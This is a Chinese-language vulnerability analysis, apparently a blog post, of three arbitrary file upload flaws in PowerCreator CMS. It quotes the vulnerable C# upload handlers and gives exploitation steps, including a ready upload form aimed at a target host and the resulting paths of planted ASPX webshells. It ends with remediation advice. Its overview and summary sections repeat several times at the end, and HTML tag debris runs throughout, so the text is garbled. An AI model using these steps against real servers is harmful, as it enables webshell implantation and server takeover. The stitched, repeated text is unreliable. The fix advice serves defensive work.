PowerCreator CMS 任意文件上传漏洞分析与利用<\/h1>

漏洞概述<\/h2>
PowerCreator CMS 存在多处任意文件上传漏洞，攻击者可利用这些漏洞上传恶意文件（如ASPX webshell）获取服务器控制权。本文详细分析四个上传接口中的三个存在漏洞的接口，并提供完整的利用方法。<\/p>

漏洞分析<\/h2>

1. UploadResourcePic.ashx 任意文件上传漏洞<\/h3>

漏洞文件<\/strong>: \/upload\/UploadResourcePic.ashx<\/code><\/p>

漏洞代码分析<\/strong>:<\/p>

public<\/span> void<\/span> ProcessRequest(HttpContext context)
<\/span><\/span>{
<\/span><\/span>    context.Response.ContentType = "text\/plain"<\/span>;
<\/span><\/span>    string<\/span> rid = context.Request["ResourceID"<\/span>] ?? string<\/span>.Empty;
<\/span><\/span>    if<\/span> (!string<\/span>.IsNullOrEmpty(rid))
<\/span><\/span>    {
<\/span><\/span>        if<\/span> (context.Request.Files.Count > 0<\/span>)
<\/span><\/span>        {
<\/span><\/span>            HttpPostedFile file = context.Request.Files[0<\/span>];
<\/span><\/span>            string<\/span> Url = PowerCreator.MediaServer.PublicClass.WebUtils.WebRoot + "\/ResourcePic\/"<\/span>;
<\/span><\/span>            string<\/span> Path = context.Server.MapPath(Url);
<\/span><\/span>            
<\/span><\/span>            if<\/span> (System.IO.Directory.Exists(Path) == false<\/span>)
<\/span><\/span>            {
<\/span><\/span>                System.IO.Directory.CreateDirectory(Path);
<\/span><\/span>            }
<\/span><\/span>
<\/span><\/span>            string<\/span> ext = file.FileName.Substring(file.FileName.LastIndexOf('.'<\/span>)).ToUpper();
<\/span><\/span>            if<\/span> (file.ContentType != "image\/jpeg"<\/span>)
<\/span><\/span>            {
<\/span><\/span>                context.Response.Write(-2<\/span>);
<\/span><\/span>            }
<\/span><\/span>            else<\/span>
<\/span><\/span>            {
<\/span><\/span>                string<\/span> newFileName = PowerCreator.MediaServer.PublicClass.Base64.Encode(rid) + ext;
<\/span><\/span>                file.SaveAs(Path + newFileName);
<\/span><\/span>                context.Response.Write(newFileName);
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>        else<\/span>
<\/span><\/span>        {
<\/span><\/span>            context.Response.Write(-1<\/span>);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    else<\/span>
<\/span><\/span>    {
<\/span><\/span>        context.Response.Write("参数错误"<\/span>);
<\/span><\/span>    }
<\/span><\/span>    context.Response.End();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点<\/strong>:<\/p>

接口无任何权限验证，可直接访问<\/li>
仅检查Content-Type是否为"image\/jpeg"，无其他安全措施<\/li>
文件名由ResourceID参数base64编码后加上原始文件扩展名组成<\/li>
<\/ol>
利用方法<\/strong>:<\/p>

构造上传表单，设置Content-Type为"image\/jpeg"<\/li>
通过GET或POST传递ResourceID参数<\/li>
上传任意文件（如ASPX webshell）<\/li>
<\/ol>
示例表单<\/strong>:<\/p>
<form<\/span> action<\/span>=<\/span>"http:\/\/target.com\/upload\/UploadResourcePic.ashx?ResourceID=1"<\/span> 
<\/span><\/span>      enctype<\/span>=<\/span>"multipart\/form-data"<\/span> method<\/span>=<\/span>"POST"<\/span>>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"file"<\/span> class<\/span>=<\/span>"file1"<\/span> name<\/span>=<\/span>"file1"<\/span> \/>
<\/span><\/span>    <button<\/span> type<\/span>=<\/span>"submit"<\/span> class<\/span>=<\/span>"but1"<\/span>>上传<\/button<\/span>>
<\/span><\/span><\/form<\/span>>
<\/span><\/span><\/code><\/pre>上传后路径<\/strong>: \/ResourcePic\/MQ==.ASPX<\/code> (ResourceID=1的base64编码为"MQ==")<\/p>
2. uploadCoursePic.ashx 任意文件上传漏洞<\/h3>
漏洞文件<\/strong>: \/upload\/uploadCoursePic.ashx<\/code><\/p>
漏洞代码分析<\/strong>:<\/p>
public<\/span> void<\/span> ProcessRequest(HttpContext context)
<\/span><\/span>{
<\/span><\/span>    context.Response.ContentType = "text\/plain"<\/span>;
<\/span><\/span>    
<\/span><\/span>    \/\/ 文件删除逻辑（无关部分省略）<\/span>
<\/span><\/span>    
<\/span><\/span>    if<\/span> (context.Request.Files.Count > 0<\/span>)
<\/span><\/span>    {
<\/span><\/span>        HttpPostedFile file = context.Request.Files[0<\/span>];
<\/span><\/span>        string<\/span> Url = PowerCreator.MediaServer.PublicClass.WebUtils.WebRoot + "\/fileManager\/UploadFile\/CoursePic\/"<\/span>;
<\/span><\/span>        string<\/span> Path = context.Server.MapPath(Url);
<\/span><\/span>
<\/span><\/span>        if<\/span> (System.IO.Directory.Exists(Path) == false<\/span>)
<\/span><\/span>        {
<\/span><\/span>            System.IO.Directory.CreateDirectory(Path);
<\/span><\/span>        }
<\/span><\/span>
<\/span><\/span>        string<\/span> ext = file.FileName.Substring(file.FileName.LastIndexOf('.'<\/span>)).ToUpper();
<\/span><\/span>        if<\/span> (!".PNG.JPG"<\/span>.Contains(ext))
<\/span><\/span>        {
<\/span><\/span>            context.Response.Write(-2<\/span>);
<\/span><\/span>        }
<\/span><\/span>        string<\/span> newFileName = Guid.NewGuid().ToString() + ext;
<\/span><\/span>        file.SaveAs(Path + newFileName);
<\/span><\/span>        context.Response.Write(Url + newFileName);
<\/span><\/span>    }
<\/span><\/span>    else<\/span>
<\/span><\/span>    {
<\/span><\/span>        context.Response.Write(-1<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点<\/strong>:<\/p>

虽然检查文件扩展名是否为.PNG或.JPG，但即使检查失败(-2)仍会继续执行上传操作<\/li>
无任何权限验证<\/li>
文件名使用GUID生成，确保唯一性<\/li>
<\/ol>
利用方法<\/strong>:

直接发送multipart\/form-data格式的POST请求到该接口，上传任意文件<\/p>
上传后路径<\/strong>: \/fileManager\/UploadFile\/CoursePic\/{GUID}.ext<\/code> (如示例中的485b1b71-8035-44c1-9ceb-637cd68eda19.ASPX<\/code>)<\/p>
3. UploadLogo.ashx 任意文件上传漏洞<\/h3>
漏洞文件<\/strong>: \/upload\/UploadLogo.ashx<\/code><\/p>
漏洞代码分析<\/strong>:<\/p>
public<\/span> void<\/span> ProcessRequest (HttpContext context) {
<\/span><\/span>    context.Response.ContentType = "text\/plain"<\/span>;
<\/span><\/span>    if<\/span> (context.Request.Files.Count > 0<\/span>)
<\/span><\/span>    {
<\/span><\/span>        HttpPostedFile file = context.Request.Files[0<\/span>];
<\/span><\/span>        string<\/span> Url = PowerCreator.MediaServer.PublicClass.WebUtils.WebRoot + "\/images\/logo\/"<\/span>;
<\/span><\/span>        string<\/span> Path = context.Server.MapPath(Url);
<\/span><\/span>
<\/span><\/span>        if<\/span> (System.IO.Directory.Exists(Path) == false<\/span>)
<\/span><\/span>        {
<\/span><\/span>            System.IO.Directory.CreateDirectory(Path);
<\/span><\/span>        }
<\/span><\/span>        string<\/span> ext = file.FileName.Substring(file.FileName.LastIndexOf('.'<\/span>)).ToUpper();
<\/span><\/span>        string<\/span> newFileName = context.Request["fileName"<\/span>];
<\/span><\/span>        file.SaveAs(Path + newFileName);
<\/span><\/span>        context.Response.Write(Url + newFileName);
<\/span><\/span>    }
<\/span><\/span>    else<\/span>
<\/span><\/span>    {
<\/span><\/span>        context.Response.Write(-1<\/span>);
<\/span><\/span>    }
<\/span><\/span>    context.Response.End();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点<\/strong>:<\/p>

无任何文件类型或扩展名检查<\/li>
无权限验证<\/li>
文件名完全由攻击者控制的fileName参数决定<\/li>
<\/ol>
利用方法<\/strong>:<\/p>

发送multipart\/form-data格式的POST请求<\/li>
通过GET或POST传递fileName参数指定最终文件名<\/li>
上传任意文件<\/li>
<\/ol>
上传后路径<\/strong>: \/images\/logo\/{指定文件名}<\/code><\/p>
4. uploadActPic.aspx (确认无漏洞)<\/h3>
该文件实际逻辑在LMS_MediaServer.dll中，经反编译分析使用白名单校验，不存在任意文件上传漏洞。<\/p>
漏洞修复建议<\/h2>

对所有上传接口添加权限验证<\/li>
实现严格的文件类型和扩展名检查（白名单方式）<\/li>
对上传文件内容进行检测（如图片魔数检测）<\/li>
限制上传目录的执行权限<\/li>
使用随机化文件名（不包含用户可控部分）<\/li>
修复逻辑错误（如uploadCoursePic.ashx中检查后仍执行上传的问题）<\/li>
<\/ol>
总结<\/h2>
PowerCreator CMS存在多处任意文件上传漏洞，主要由于缺乏权限验证和不足的文件安全检查导致。攻击者可利用这些漏洞上传webshell获取服务器完全控制权。建议使用该CMS的用户立即检查并修复这些安全问题。<\/p>

PowerCreator CMS 任意文件上传漏洞分析与利用<\/h1>

漏洞概述<\/h2> PowerCreator CMS 存在多处任意文件上传漏洞，攻击者可利用这些漏洞上传恶意文件（如ASPX webshell）获取服务器控制权。本文详细分析四个上传接口中的三个存在漏洞的接口，并提供完整的利用方法。<\/p>

漏洞分析<\/h2>

总结<\/h2> PowerCreator CMS存在多处任意文件上传漏洞，主要由于缺乏权限验证和不足的文件安全检查导致。攻击者可利用这些漏洞上传webshell获取服务器完全控制权。建议使用该CMS的用户立即检查并修复这些安全问题。<\/p>

漏洞概述<\/h2>
PowerCreator CMS 存在多处任意文件上传漏洞，攻击者可利用这些漏洞上传恶意文件（如ASPX webshell）获取服务器控制权。本文详细分析四个上传接口中的三个存在漏洞的接口，并提供完整的利用方法。<\/p>

总结<\/h2>
PowerCreator CMS存在多处任意文件上传漏洞，主要由于缺乏权限验证和不足的文件安全检查导致。攻击者可利用这些漏洞上传webshell获取服务器完全控制权。建议使用该CMS的用户立即检查并修复这些安全问题。<\/p>